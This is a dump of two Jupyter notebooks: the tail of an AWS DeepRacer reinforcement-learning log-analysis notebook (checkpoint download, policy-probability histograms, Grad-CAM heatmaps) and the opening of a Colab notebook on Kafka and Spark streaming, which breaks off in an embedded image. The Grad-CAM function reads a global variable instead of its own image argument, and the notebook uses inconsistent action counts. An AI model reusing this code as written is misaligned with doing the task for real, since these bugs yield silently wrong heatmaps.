str(iter_num) + ' w rew >= '+str(th)) ax.set_ylabel(action_names[idx]) # calculate action way point distribution action_waypoint_distribution = list() for idWp in range(len(wpts_array)): action_waypoint_distribution.append(len(df_slice[df_slice['closest_waypoint'] == idWp])) ax = fig.add_subplot(6, 2, 2 * idx + 2) # Call function to create error boxes _ = make_error_boxes(ax, segment_x, segment_y, segment_xerr, segment_yerr) for tt in range(len(track_segments)): ax.text(track_segments[tt][0], track_segments[tt][1], track_segments[tt][2]) ax.bar(np.arange(len(wpts_array)), action_waypoint_distribution) ax.set_xlabel('waypoint') ax.set_ylabel('# of actions') ax.legend([action_names[idx]]) ax.set_ylim((0, 150)) ###Output Number of steps in iteration= 0 ###Markdown Lets analyze the hairpin turn for the best iteration. We see that the model like to take Slight left and Straight over other actions, we see that slight right and right actions frequency is very low in comparison. In short, this model seems to do well for the hairpin turn Simulation Image Analysis - Probability distribution on decisions (actions)is the model making decisions that are "too close" or is it confident for the laps it finishes. if the top and second best decisions are far apart, the model must likely be making more confident decisions ###Code import glob img_path = "simulation_episode/" all_files = sorted(glob.glob(img_path + '/*.png')) !grep "S3 bucket" $fname !grep "S3 prefix" $fname ###Output S3 bucket: aws-deepracer-0366eb7d-d338-48e6-b5b3-3a1fc7e3681e S3 prefix: DeepRacer-SageMaker-RoboMaker-comm-251199395322-20190819134948-3a1a4c3e-b32a-44f3-b333-221a2fb216d3 ###Markdown Download all the checkpoints (provided as an example). We recommend downloading only the ones you are interested in ###Code ##!aws s3 sync s3://$s3_bucket/$s3_prefix/model/ intermediate_checkpoint/ --exclude "*" --include "*model_*" ## For this example lets download all models in interation in the 30s ## NOTE: Copy the variables from the output of the grep command s3_bucket = '' s3_prefix = '' !aws s3 sync s3://$s3_bucket/$s3_prefix/model/ intermediate_checkpoint/ --exclude "*" --include "*model_3*" import tensorflow as tf import numpy as np from tensorflow.python.platform import gfile from PIL import Image GRAPH_PB_PATH = 'intermediate_checkpoint/' def load_session(pb_path): sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True, log_device_placement=True)) print("load graph:", pb_path) with gfile.FastGFile(pb_path,'rb') as f: graph_def = tf.GraphDef() graph_def.ParseFromString(f.read()) sess.graph.as_default() tf.import_graph_def(graph_def, name='') graph_nodes=[n for n in graph_def.node] names = [] for t in graph_nodes: names.append(t.name) x = sess.graph.get_tensor_by_name('main_level/agent/main/online/network_0/observation/observation:0') y = sess.graph.get_tensor_by_name('main_level/agent/main/online/network_1/ppo_head_0/policy:0') return sess, x, y def rgb2gray(rgb): return np.dot(rgb[...,:3], [0.299, 0.587, 0.114]) !ls $GRAPH_PB_PATH model_inference = [] iterations = [30, 36] for ii in iterations: model, obs, model_out = load_session(GRAPH_PB_PATH + 'model_%s.pb' % ii) arr = [] for f in all_files[:]: img = Image.open(f) img_arr = np.array(img) img_arr = rgb2gray(img_arr) img_arr = np.expand_dims(img_arr, axis=2) current_state = {"observation": img_arr} #(1, 120, 160, 1) y_output = model.run(model_out, feed_dict={obs:[img_arr]})[0] arr.append (y_output) model_inference.append(arr) model.close() tf.reset_default_graph() prob_diff = [] for mi in model_inference[0]: max1, max2 = mi.argsort()[-2:][::-1] prob_diff.append(mi[max1] - mi[max2]) plt.hist(prob_diff) prob_diff = [] for mi in model_inference[1]: max1, max2 = mi.argsort()[-2:][::-1] prob_diff.append(mi[max1] - mi[max2]) plt.hist(prob_diff) ###Output _____no_output_____ ###Markdown model 36 appears to have a better seperation in probabability, hence may work better in sim2real experiments Model CSV AnalysisDownload the model from the console AWS DeepRacer > Reinforcement learning > $Training Job Name$ > Download Model ###Code fname = 'intermediate_checkpoint/worker_0.simple_rl_graph.main_level.main_level.agent_0.csv' df_csv = pd.read_csv(fname) df_csv.columns title = "Training" df_csv.plot(x='Training Iter', y='Training Reward', style='.', title=title) df_csv['Episode Length'].plot() ###Output _____no_output_____ ###Markdown Evaluation Run AnalyisDebug your evaluation runs or analyze the laps ###Code eval_sim = 'sim-h712thgp6gz2' eval_fname = 'deepracer-eval-%s.log' % eval_sim cw_utils.download_log(eval_fname, stream_prefix=eval_sim) !head $eval_fname eval_fname = 'logs/deepracer-eval-sim-sample.log' eval_data = load_data(eval_fname) eval_df = convert_to_pandas(eval_data, None) eval_df.head() ###Output _____no_output_____ ###Markdown Grid World Analysis Understand the speed of the car along with the path on a per episode basis. This can help you debug portions of the track where the car may not be going fast. Hence giving you hints on how to improve your reward function. ###Code N_EPISODES = 3 for e in range(N_EPISODES): print ("Episode #%s " %e) episode_df = eval_df[eval_df['episode'] == e] plot_grid_world(episode_df, inner_border, outer_border, scale=5.0) print ("###############################################################\n\n") ###Output _____no_output_____ ###Markdown What is the model looking at?Gradcam: visual heatmap of where the model is looking to make its decisions. based on https://arxiv.org/pdf/1610.02391.pdf ###Code import cv2 import numpy as np import tensorflow as tf def visualize_gradcam_discrete_ppo(sess, rgb_img, category_index=0, num_of_actions=6): ''' @inp: model session, RGB Image - np array, action_index, total number of actions @return: overlayed heatmap ''' img_arr = np.array(img) img_arr = rgb2gray(img_arr) img_arr = np.expand_dims(img_arr, axis=2) x = sess.graph.get_tensor_by_name('main_level/agent/main/online/network_0/observation/observation:0') y = sess.graph.get_tensor_by_name('main_level/agent/main/online/network_1/ppo_head_0/policy:0') feed_dict = {x:[img_arr]} #Get he policy head for clipped ppo in coach model_out_layer = sess.graph.get_tensor_by_name('main_level/agent/main/online/network_1/ppo_head_0/policy:0') loss = tf.multiply(model_out_layer, tf.one_hot([category_index], num_of_actions)) reduced_loss = tf.reduce_sum(loss[0]) conv_output = sess.graph.get_tensor_by_name('main_level/agent/main/online/network_1/observation/Conv2d_4/Conv2D:0') grads = tf.gradients(reduced_loss, conv_output)[0] output, grads_val = sess.run([conv_output, grads], feed_dict=feed_dict) weights = np.mean(grads_val, axis=(1, 2)) cams = np.sum(weights * output, axis=3) ##im_h, im_w = 120, 160## im_h, im_w = rgb_img.shape[:2] cam = cams[0] #img 0 image = np.uint8(rgb_img[:, :, ::-1] * 255.0) # RGB -> BGR cam = cv2.resize(cam, (im_w, im_h)) # zoom heatmap cam = np.maximum(cam, 0) # relu clip heatmap = cam / np.max(cam) # normalize cam = cv2.applyColorMap(np.uint8(255 * heatmap), cv2.COLORMAP_JET) # grayscale to color cam = np.float32(cam) + np.float32(image) # overlay heatmap cam = 255 * cam / (np.max(cam) + 1E-5) ## Add expsilon for stability cam = np.uint8(cam)[:, :, ::-1] # to RGB return cam import glob img_path = "simulation_episode/" all_files = sorted(glob.glob(img_path + '/*.png')) model_path = GRAPH_PB_PATH + 'model_30.pb' #Change this to your model 'pb' frozen graph file model, obs, model_out = load_session(model_path) heatmaps = [] for f in all_files[:5]: img = np.array(Image.open(f)) heatmap = visualize_gradcam_discrete_ppo(model, img, category_index=0, num_of_actions=10) heatmaps.append(heatmap) tf.reset_default_graph() plt.imshow(heatmaps[0]) ###Output _____no_output_____
_notebooks/2021-06-25-kafka-spark-streaming-colab.ipynb
###Markdown Kafka and Spark Streaming in Colab> Installing Kafka and Spark streaming in colab and streaming movielens dataset- toc: true- badges: true- comments: true- categories: [spark, pyspark, kafka, movie]- image: ![image.png](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABAAAAAJACAYAAAATlRTVAAAgAElEQVR4Aezdz6t9X34WeCH/QE8ydNhYQ3HgIJVpEBVEeiQh4ihgsCGxhn5RhA4pkkkCJhQEbDpScZCkwLQWWGCVjbSxBqasgT+SyiCpRiVWEoMpEypUkdu8Tn2eT72/67vPvefee+69Z5/zLNh37b1+vtez1t5nPc9ae98/dVdXBIpAESgCRaAIFIEiUASKQBEoAkWgCFw9An/q6lvYBhaBIlAEikARKAJFoAgUgSJQBIpAESgCdxUAOgiKQBEoAkWgCBSBIlAEikARKAJFoAjcAAIVAG6gk9vEIlAEikARKAJFoAgUgSJQBIpAESgCFQA6BopAESgCRaAIFIEiUASKQBEoAkWgCNwAAhUAbqCT28QiUASKQBEoAkWgCBSBIlAEikARKAIVADoGikARKAJFoAgUgSJQBIpAESgCRaAI3AACFQBuoJPbxCJQBIpAESgCRaAIFIEiUASKQBEoAhUAOgaKQBEoAkWgCBSBIlAEikARKAJFoAjcAAIVAG6gk9vEIlAEikARKAJFoAgUgSJQBIpAESgCFQA6BopAESgCRaAIFIEiUASKQBEoAkWgCNwAAhUAbqCT28QiUASKQBEoAkWgCBSBIlAEikARKAIVADoGikARKAJFoAgUgSJQBIpAESgCRaAI3AACFQBuoJPbxCJQBIpAESgCRaAIFIEiUASKQBEoAhUAOgaKQBEoAkWgCBSBIlAEikARKAJFoAjcAAIVAG6gk9vEIlAEikARKAJFoAgUgSJQBIpAESgCFQA6BopAESgCRaAIFIEiUASKQBEoAkWgCNwAAhUAbqCT28QiUASKQBEoAkWgCBSBIlAEikARKAIVADoGikARKAJFoAgUgSJQBIpAESgCRaAI3AACFQBuoJPbxCJQBIpAESgCRaAIFIEiUASKQBEoAhUAOgaKQBEoAkWgCBSBIlAEikARKAJFoAjcAAIVAG6gk9vEIlAEikARKAJFoAgUgSJQBIpAESgCFQA6BopAESgCRaAIFIEiUASKQBEoAkWgCNwAAhUAbqCT28QiUASKQBEoAkWgCBSBIlAEikARKAIVADoGikARKAJFoAgUgSJQBIpAESgCRaAI3AACFQBuoJPbxCJQBIpAESgCRaAIFIEiUASKQBEoAhUAOgaKQBEoAkWgCBSBIlAEikARKAJFoAjcAAIVAG6gk9vEIlAEikARKAJFoAgUgSJQBIpAESgCFQA6BopAESgCRaAIFIEiUASKQBEoAkWgCNwAAhUAbqCT28QiUASKQBEoAkWgCBSBIlAEikARKAIVADoGikARKAJFoAgUgSJQBIpAESgCRaAI3AACFQBuoJPbxCJQBIpAESgCRaAIFIEiUASKQBEoAhUAOgaKQBEoAkWgCBSBIlAEikARKAJFoAjcAAIVAG6gk9vEIlAEikARKAJFoAgUgSJQBIpAESgCFQA6BopAESgCRaAIFIEiUASKQBEoAkWgCNwAAhUAbqCT28QiUASKQBEoAkWgCBSBIlAEikARKAIVADoGikARKAJFoAgUgSJQBIpAESgCRaAI3AACFQBuoJPbxCJQBIpAESgCRaAIFIEiUASKQBEoAhUAOgaKQBEoAkWgCBSBIlAEikARKAJFoAjcAAIVAG6gk9vEIlAEikARKAJFoAgUgSJQBIpAESgCFQA6BopAESgCRaAIFIEiUASKQBEoAkWgCNwAAhUAbqCT28QiUASKQBEoAkWgCBSBIlAEikARKAIVADoGikARKAJFoAgUgSJQBIpAESgCRaAI3AACFQBuoJPbxCJQBIpAESgCRaAIFIEiUASKQBEoAhUAOgaKQBEoAkWgCBSBIlAEikARKAJFoAjcAAIVAG6gk9vEIlAEikARKAJFoAgUgSJQBIpAESgCFQA6BopAESgCRaAIFIEiUASKQBEoAkWgCNwAAhUAbqCT28QiUASKQBEoAkWgCBSBIlAEikARKAIVADoGikARKAJFoAgUgSJQBIpAESgCRaAI3AACFQBuoJPbxCJQBIpAESgCRaAIFIEiUASKQBEoAhUAOgaKQBEoAkWgCBSBIlAEikARKAJFoAjcAAIVAG6gk9vEIlAEikARKAJFoAgUgSJQBIpAESgCFQA6BopAESgCRaAIFIEiUASKQBEoAkWgCNwAAhUAbqCT28QiUASKQBEoAkWgCBSBIlAEikARKAIVADoGikARKAJFoAgUgSJQBIpAESgCRaAI3AACFQBuoJPbxCJQBIpAESgCRaAIFIEiUASKQBEoAhUAOgaKQBEoAkWgCBSBIlAEikARKAJFoAjcAAIVAG6gk9vEIlAEikARKAJFoAgUgSJQBIpAESgCFQA6BopAESgCRaAIFIEiUASKQBEoAkWgCNwAAhUAbqCT28QiUASKQBEoAkWgCBSBIlAEikARKAIVADoGikARKAJFoAgUgSJQBIpAESgCRaAI3AACFQBuoJPbxCJQBIpAESgCRaAIFIEiUASKQBEoAhUAOgaKQBEoAkWgCBSBIlAEikARKAJFoAjcAAIVAG6gk9vEIlAEikARKAJFoAgUgSJQBIpAESgCFQA6BopAESgCRaAIFIEiUASKQBEoAkWgCNwAAhUAbqCT28QiUASKQBF4HgLf/Npv3n3jK1+8+6Mvf+7uG1/46buv//KP9SgGJ48BY8Zh/BhLf/zH33jegGzuIlAEikARKAJPRKACwBOBa7YiUASKQBG4XgT+5E/+5EDSkH5k//d+9PveH7/zd7/3ziGsfnF4aBzM8TLHEUGgYsD1PkPasiJQBIrApSJQAeBSe6Z2FYEiUASKwJsggPwj/n/w8594T/JD4up/W/woDs/DYUsIMO7qikARKAJFoAi8NAIVAF4a4ZZfBIpAESgCu0HA1mwrs1nVPUZ0J4Hr+Xd2RxSL41gcG0vCiU1Ep4oAu3lU1NAiUASKwG4RqACw266r4UWgCBSBInBOBGzHRsRWoobUHgia97i/8sXDtu0StXMif/1lEZbyHQmvlBzbXeIbAf0+wPWPh7awCBSBIvCWCFQAeEv0W3cRKAJFoAhcBALIGWK2kv+szIqvKwLnQIB4dBADNnaaEJsOHwr81rfOUVXLKAJFoAgUgSLwEQQqAHwEkgYUgSJQBIrALSFgxTUf+osAgIjlI223hEXb+roIEALW3QARAbrL5HX7orUVgSJQBG4FgQoAt9LTbWcRKAJFoAhsImDFFema5F9YCdgmXA08MwLHBKjuOjkz0C2uCBSBIlAEDghUAOhAKAJFoAgUgZtFAMlayf9h5b9bsG92TLxFw//nH379Q9+fMCbtSun3AN6iN1pnESgCReC6EagAcN3929YVgSJQBIrAPQisX/wv6boHrEa9KALI/ipGdRfAi0LewotAESgCN4lABYCb7PY2uggUgSJQBPL+9dz6X8LVcfEWCHjdxLG+jkKgqisCRaAIFIEicE4EKgCcE82WVQSKQBEoArtBwL/0myuuJVu76bqrNXRLlOprAFfb3W1YESgCReBNEKgA8Cawt9IiUASKQBF4SwSstiL8c/WfIFBXBN4Sga1x2V0pb9kjrbsIFIEicH0IVAC4vj5ti4pAESgCReAEBPz7tQgAzku0TgCtSV4cgXVnitcC6opAESgCRaAInAuBCgDnQrLlFIEiUASKwK4QmNv/CQDdar2r7rtaYwlRc2z6MGVdESgCRaAIFIFzIVAB4FxItpwiUASKQBHYFQIrybL9uq4IvDUC638DqADw1j3S+otAESgC14VABYDr6s+2pggUgSJQBE5EINv/+f0A4ImgNdmrIDDFKbtT6opAESgCRaAInAuBCgDnQrLlFIEiUASKwK4QmAJAV1l31XVXb2wFgKvv4jawCBSBIvBmCFQAeDPoW3ERKAJFoAi8JQJTAOgOgLfsida9IlABYEWk10WgCBSBInAuBCoAnAvJllMEikARKAK7QmAKAN0BsKuuu3pjKwBcfRe3gUWgCBSBN0OgAsCbQd+Ki0ARKAJF4C0RmAJAdwC8ZU+07hWBCgArIr0uAkWgCBSBcyFQAeBcSLacIlAEikAR2BUCUwDoDoDX6brPf/5f3H36058+HMdqvO+/Mfzar/2n9/l/66tfPVbE7sMrAOy+C9uAIlAEisDFIlAB4GK7poYVgSJQBIrASyIwBYDuAHhJpL9d9je/9a27j3/Px+++67u+6+5jH/vYZoVf+tKX7j744IO7T33qU3e//d9++0NpCAOf/OQnD/m/+7u/+46YcK2uAsC19mzbVQSKQBF4ewQqALx9H9SCIlAEikAReAMEpgBwDTsA/P/4z3zmMweSjCj/m3/zKyejKq+VefmO5UXgkW7xWwT9ocqs2CP+BIC//gM/8JHkbIhAgOCrY7r/+Ydfv/uhH/qb7wUEuwGu1VUAuNaebbuKQBEoAm+PQAWAt++DWlAEikARKAJvgMAUAK5hBwCCHQJ9jGQfg/mzn/1nd0i3fA5Cwur++//4vQNxF6+exxLwWcdK7tWF4Kd+/kxj9d+OgLTvL/+lv3jHnmt1FQCutWfbriJQBIrA2yNQAeDt+6AWFIEiUASKwBsgMAWAa9gBYMU/K+wh6afAOol9CPgWuZ8Cw1MIOEKf8re272eLP5JvpX99x59NESnE3/etgFPafclpKgBccu/UtiJQBIrAvhGoALDv/qv1RaAIFIEi8EQEpgCw9x0AyLBV+xBsPrJ8yip58oVcExHW9+9B7P38pPnEJ/72o1C3vX9u31fWltMOrxpskXuiQdrndYVrdhUArrl327YiUASKwNsiUAHgbfFv7UWgCBSBIvBGCEwBYO87AJBm7+YjyAi8VXRk/RjRDuQEgqR9aHu9Lfwh4HN7fsq6zyco2DUgP39LYLgvv7i5g+Chdj1U1qXHVwC49B6qfUWgCBSB/SJQAWC/fVfLi0ARKAJF4BkITAFg7zsAvD/vw3oINh/JJgBsvcsfyIgGSLV08kQA8BV+K/arEx4B4DEfGLSab/t+Xk+wE2CrfGHa4Vh3ALhO+9grDScPMcHrAnyCxpp3bccerisA7KGXamMRKAJFYJ8IVADYZ7/V6iJQBIpAEXgmAlMA2PsOAMQ3BNtOgGy3d37MIeVIv3y21Cf/se31WcGfBPxY2Ws4wUA+AsKWTUg7MQLJJzSE4KccYkXsY4f0dgFImx0M4sURPbYEhpS1B78CwB56qTYWgSJQBPaJQAWAffZbrS4CRaAIFIFnIjAFgD3vAECGrX5ndR4Bzmr9fR/LyysD3ueXB0F3bH2gD6EOAUe4H+uyfV/5XiWYjv15FUEbkHjX01nhj4CgbcqLPWl3fOnEEw326ioA7LXnancRKAJF4PIRqABw+X1UC4tAESgCReAFEJgCwN53AMz385Flq/iIMDK99b59CDUS7TxiAHK/9R8ArLaHgD/2A4C6bm7fV9/q5n8wQPDXFfzZvhB/tiL68jrYFRul2WrHWu+lXlcAuNSeqV1FoAgUgf0jUAFg/33YFhSBIlAEisATEJgCwN53AITAI8C2z1vFd75F6JFrZNmKuXwEghB0gsG6/R60dghkhf3YKwL3dQE75EfMt1bmswNBGqTeroDp0j7x2uWakDDT2TWQdqScWcaezisA7Km3amsRKAJFYF8IVADYV3/V2iJQBIpAETgTAlMA2PMOACQ4xBfRRvCRY2TbYXU8TlrigHBppUtapHlrdV+evFKAfM/yUu59PkFB2Q52rk75IfjKX19B0J60TzwBYt0hkDLZlrq22pJ0l+5XALj0Hqp9RaAIFIH9IlABYL99V8uLQBEoAkXgGQhMAWDPOwDmBwC982+F3ZFV9/nOPTIeMm3VnbO9P6R5a3V/5iEcPHZr/Szf6v7qZvlsXssnUNiZEAFh65UGZRISYJG2yLNXVwFgrz1Xu4tAESgCl49ABYDL76NaWASKQBEoAi+AwBQA9rwDAMFGzBHfuX0+RH+GWSG3ip6dAmBF+kOalbU6BDxiwrFvCqx55rX6U/7W7gGEfpZPEJhuts+q/rHVf3nEpa4KABPFnheBIlAEikAR+DYCFQA6EopAESgCReAmEZgCwJ53ACDwSP26fT7b6pFmq+OINVK8phOPNAtf38+XL6KBNNKuae4bPPLnXxIqn5iwOiv+4lL+Gj8/ALi1g2CmJyZEANh63WCmveTz7gC45N6pbUWgCBSBfSNQAWDf/Vfri0ARKAJF4IkITAFgrzsAEOwQfbsA5gp+iDPSj7TnQ3uI8fw3e1l952+5+QHAhwj4mj+iA1Ku/K3t+975D2lfX0HQvuwgWIWLtS7X8xsAcNmrqwCw156r3UWgCBSBy0egAsDl91EtLAJFoAgUgRdAYAoAe9wBgBzP9+fX7flW2xFrwkDeo0ei5zZ8hPy+1XfCQQSGUwj47Cb2Wd3P6wl2Aqzb+6VP+Wxd3/+fHwBMO2Yd83yKIcqa7Zzp9nBeAWAPvVQbi0ARKAL7RKACwD77rVYXgSJQBIrAMxGYAsBedwDM9/Ot7M/t+ch9yLdVdATeFv7p8u8CEeZ19V26xxDwWW7OZ/lsQNJXl28VsG99v9912mAHwWzfWs7E4iGxYM17adcVAC6tR2pPESgCReB6EKgAcD192ZYUgSJQBIrAIxCYAsBedwDM9+fXLe+2+dsVgNwj10jxusI+t9dvrZhbsT+VgG9BP8uf/40gaVeCn/D486v+dhAcc4SB1KW9/m3hKiYcy3uJ4RUALrFXalMRKAJF4DoQqABwHf3YVhSBIlAEisAjEZgCwF53AOQ9/63t+QhwPvCHFCPIcwXdeT7QZ3V9FQfAmdcI5F93DzwE96x/S3yQfwoYW+Wf+k6/ciJUHKvrIXsvKb4CwCX1Rm0pAkWgCFwXAhUArqs/25oiUASKQBE4EYEpAOxxB4Bm5v15AsD6gT3b7bMqjuAj89NJnx0CtuGv+aWNwEAA2HpFYJa3ns8dCOqfHx5M2nyYcKv8ab94ZWzZqF15jUA6bd561SB17sGvALCHXqqNRaAIFIF9IlABYJ/9VquLQBEoAkXgmQhMAWCvOwBCfK16b5Fe/xXAyrp38df4uWouzdwdEGhtpUeqHcQGhP2+Q5mpB1nPqnzIe+JS/hQw1lcQpE37CBxsIFhIh/Q7iBLKjo173/ofXCoABIn6RaAIFIEicG4EKgCcG9GWVwSKQBEoArtAYAoAe9wBgLCHYCPKj3HI9fqBvjW/NNkhEIL9kD9X36cAgMB73WDuApj/wQCJJx5MJ23IPWKf1xWUJTxtZ5MwYsIsf5a1t/MKAHvrsdpbBIpAEdgPAhUA9tNXtbQIFIEiUATOiMAUAPa4AyAEG/lFvB/rrJ7Li0ivq+/KCgGX5pRDOUSFON8AmDsIiAlzC79zwoWy+St5JwiE6Ct3po8QIa9yvaqw9S8GY8ve/AoAe+ux2lsEikAR2A8CFQD201e1tAgUgSJQBM6IwBQA9rYDwOp8DpA4f457bv6tupWJlBMXvDbgdYT5msG0fyv/DIt9fMKA8pB+rwEkbqbf+3kFgL33YO0vAkWgCFwuAhUALrdvalkRKAJFoAi8IAJTANjjDoAXhOasRT+G6D+24msk/zCoAPDYkdD0RaAIFIEicCoCFQBORarpikARKAJF4KoQmALA3nYAXFVHtDEfQaACwEcgaUARKAJFoAicCYEKAGcCssUUgSJQBIrAvhCYAkB3AOyr767d2goA197DbV8RKAJF4O0QqADwdti35iJQBIpAEXgFBGwT94G5dbv4FAC6A+AVOqJVnIxABYCToWrCIlAEikAReCQCFQAeCViTvw4C//0Pv3X35d/95t3n//O3D9d1RaAIFIGnIvATn/tbd1/+r7/yoY/QTQGgOwCeimzzvQQCFQBeAtWWWQSKQBEoAhCoANBxcFEI+EI04v+D//zrd3/6F/7d+8P1b/3OH12UrTWmCBSB/SDwwS//tbuIALF6CgDdARBU6l8CAhUALqEXakMRKAJF4DoRqABwnf26y1Yh/z/77//4PemfAoDzv/+vf/9Dq3ev0chf/Y2v3f3wz/zC4fjxX/rVk//PtLTJ97l/+18+svX4NWxvHUWgCHwHAQJAjv/nN375cC9PAaA7AL6DVc9eB4GMx4hTBKr/61d+4nD83E98/90X/8FfPRx/8POfOIzX9RWW17GytRSBIlAEisC1IVAB4Np6dKftscUfwV9J/3r92rsA/vEX/uPd//LX/vf3h/eIH3ImaX/l7/3s+zzEgE7cHkKt8UXg5RBw/yFZ//eX/tHhyPkUALoD4OXwb8kfRSBjcpJ+5N+1Y4oDzsUZv15j2fqexUdraEgRKAJFoAgUgW0EKgBs49LQV0TgVPKfXQCvSaafIgCArgLAKw6gVlUETkAAicrKP9+1VdaIABUATgCxSc6KQIj9l770pbt/829+5SPH5z//Lw6kP8KA9I6IBsYxMeCP//gbFZnP2jMtrAgUgSJw3QhUALju/r3o1h17339d9V+vfSPgNRyh4SkCgHwVAF6jh1pHETgNgay2Ikzc4dnzX3/lvQhgq3UFgNOwbKrzIGAMTgGACPDQQSSwC2AVBFx3Z8B5+qWlFIEiUARuAYEKALfQyxfaRkR+JfenXL/mtwCeIgCAuwLAhQ66mnWzCCBbEQCAQBRAmqym2gnw67/4UzeLTRv+Ngg8VgCYAsEUA5TjMJaNcTsC6opAESgCRaAIHEOgAsAxZBr+YgiYnNz3sb9TRIDH7gKwTdLH+ObH+Zz7yB97xCH7DmHIAfeQAKDc5Jt57xMArPyoY+b7n3/49UN9My4fEWSntL5/MOtjs+u6IlAEthFwH7tHfuv3v3IgSFMASA5xiJODIJB7P/F79bXjt7761cO28vva4Jnzkm32bPvsZ//Zi9ZxX/vWOG3V5rd2bFgFAKQ+rwNMfz2fQkDi7AwwhqcQ8Nv/7bcvBve3xrv1F4EiUASKwHcQqADwHSx69goIPOZ9//uEALsATnEme/mS//yY3zxHsCdhR7wzIUa8Z9pJuJ1Lm/g/94M/+V48mOUpP+WxGXFPHr4yTJId0ipnxudcmdOe1HcKDk1TBG4JAaIeYp/t0lkhRfC3nHvZNmrpiASXQBC37HxsGOL9yU9+8mg27fz0pz9995nPfOZomudGECH++g/8wMVgChNtvoQ+XgWAldhvXUckOBY3x3x2BERgfm5fNn8RKAJFoAhcBwIVAK6jH3fRCivYp3zp/z7iP+Me+o8AIf/HCHWI9eqfIgCYUE3yrwzkPER/SwDYskcZ2rFV3mrX1jVxo64IFIFvv9ePyCPwWdHnz/ejj22Ndm9OEQCJugbSdIoAgPz72NxLuUsSAPSztmpzntUv1e6Hyt3aAbBF6oUdI/33ha87Aghix8b/Q7Y2vggUgSJQBK4LgQoA19WfF9saW/Z/8J9//Unv/E/SP88f+haACf0k4gi062ypX1f+Q7AfEgBMouRNej7yP1eUZr3ShvzPcOds5ObKvvKIFuwQLv8qNiRNBYCLHfI17JUQcN9ltT9boJF+QkDuL/ffqYQPccrKbPK/UlPOXs1DAkAqPBWbpH+Mf0kCALsfMxYe086npM04C/GfhH6eJ/6Yf1/aKQS4L7wWUFcEikARKAK3jUAFgNvu/1dp/ef/8/nJf4SAY98CQApWUo1Im9Bnsss3OV3J9UMCwFa5c2VFuZPoq1f8DJvb99k0dylI5zWBlKk8q5FrvUSACgCvMoRbyYUi4N5BakL8kR1iwHNW7913xIOQs3OIAIgbm37t1/7TYUu+Legp1zPoU5/61OHYImfyiP/ggw8Oq9d5fqVL2IsA2uovnfRJEwFAXepMGckrnfRs4HLNjtilXGlWp17lK1O9ac+aTjlbrwDARNnHypcvNluxn32aNgsTl/rZyXa+sK2ylZv2KCd9E3vkO9YPsVcatmm/Mp7iTt0BsJL7XMdnd46tMHHC3SfGtHvlmr518RTsm6cIFIEicOsIVAC49RHwgu03wXnux/5C9I/5x3YBmIxOwu2cPVtO2knA7xMAVhKO3G+VO+tW3hQZJvlnz1rmfaRefYh/dwBs9WTDbgEB9xuSPwkNwh6CiMSGAD8Hj/yHAIRJfc8p8xOf+NvvyS4yhkAixcgrUikMofzLf+kvvieU2hkCHGKnHHnzzEE+EXDh0jh+6If+5nsCi6CqRxrn4lNvsFG/OE4bla88eVKmPM7jPDNjCzKtHdIg16tbBQA2pw55YzMbgrEw5QuTho3sCdnW12mXuqURlnSxXX7pkOC4YO4a0VePfA7p0jcRNNikHLiqx5G62Zm+SPmP8SMyhcCHrM/rnKsr5w/5x9J6/WGKZblnHmNz0xaBIlAEisD+EagAsP8+vMgWnOtjf8eI/wzf+haAid0k4YhzJpdbgE2CfkwAmCIBAq78TBJnmeqZdYewx0f446RdSf19E0riQMpZhYSUWb8IXCsCCMt8x9+Kv3v9vnv7qVgoMzsB1HPffflQHSHLIVyILBKJbOYZovyVrEof0qsO5FNZyYOYuk650jgPHiHAc0UbeZQn5SK+0nHyhUSnTGHsdKRcwoTrlCHvJNaHwt79WQWA1J82SKZdSHvC1nazHzYz/uPf8/FDnbGJLcpgf+yCKTvZFqet0nApV/wsJ2RfmpSLVMdp08Qw4Y/x2TYFgC3SvhW2kv+kiX8sPuHSRTzjz7HxGPubtggUgSJQBPaLQAWA/fbdxVqO/J/7ff8/85OfPfr9ALsAMnkLKCZok7BP0p00058k/JgAEOId/z4Cfp8AoK5MUNk965bvPjfbdV/995XRuCKwNwSQpbnqH+Ii/KWc+qyWOkI8n1oXsoh4TYesrh/fm2Q8aT0jkDT3vvTIqXPhq2CQPPEn2U2YvMpIm2adylwJs3wpB94O9SLtysiRlfE822Z90qevlO9IPn4EAH4cW8SxV7jdEc45AoEycy1MvdqyYhqxQnncFCrgqnQaQF8AACAASURBVG9WEpwdBClXmmkbu2C45jtU8Ig/UwAIQb/PnyR/ns88x8LXNEStvBLw3B0uj2hykxaBIlAEisAFIFAB4AI64VpMMME6x8f+kH3HJPAh3dOfosD8FgA7TMwmCUeyMwFc8RZ+yg6AWXfO1WEyOJ3yZt1JO32CRCbEUwDQ5oTPMnPeHQBBov6tIIDsTbJia/5998hzcXH/uqeJDNn+/9wytwSALbIqbK5We44hsMJzhPiy0fn6/Jm2hrjPMKSZPcmnXOk4bUfOc518SLV0SDabkPEQ+elLk50Dyau+KQCo2zHzOUe6Q+jVE6KuTPFW/BMfAWAS8GMCgHLk1zYu5TqXny2zHOFTnDHW5JdPGQ54SPOccShvBACkPQeivpL49XqS+fvOZ755njzaEZHrpe+rA/j9UwSKQBEoAheBQAWAi+iG6zACCZ9b8x97fgrpnyQ65/Kt3wIwuZ0k3PmxyZq0U2y4bweActZ39hH4texZNzvlmSLDXL1fyzv2DQATzykWKPdY2usYUW3FrSOAmM3tyu7VELmXwga5DPk/FylCMhGw6RDbdbVaGKLJaatrAgAcPGP4IcpbJHiW7/wlBAD1ZjWePfPY6p9VAJhtmnmda6P+Rbils+qO2HMRPpxvtf2lBAD16Tv1swn++jNixMG4J/4hAGQVPkScb/w5CF/qnuT9lPMQ/C1/ze86dXvl5aXvrydC1WxFoAgUgSJwRgQqAJwRzFstysTrOR/7Q+BD5p/qI9zrLoCVWCPPc4JqomMSN4m5+l2H0K9lmKRya7jr5FHuFABSnrwznAjg+wVsmgJExIGUpz4T3rXOCgC3esddf7s9U+ZH+Jy/BjFRbwQHdZ7LrQKAtiCT9wkAyK98ng9xnleTfIZMJ371zyEAsJWd6oIPx4bYLn4eqw2rABCbUpa803lOrtvrpX0rAcBzmCDBbrZpz3w2T9sfc67dCH6OkH4+Qh5xIH6EgS1R4BSiv5UmYfoy454IkL55THuatggUgSJQBPaDQAWA/fTVRVpqImT1/bGr/dKfg/hPwQDBn24l3NIi4NIh0/xJyFMWAi7exHsl3ZmMmyCtwsFcjZ/lqicT5LmFX33KQO6lSf18NsRONqx1Ja00ylwn0ROHnheBPSHg3sqH/pAS7ye/hvMsy0f/+OcgebF7FQCEPyQAhDjzOc8eeSYRThqruHnGZIVXnpDtQwHv/sgzhQVlSscpI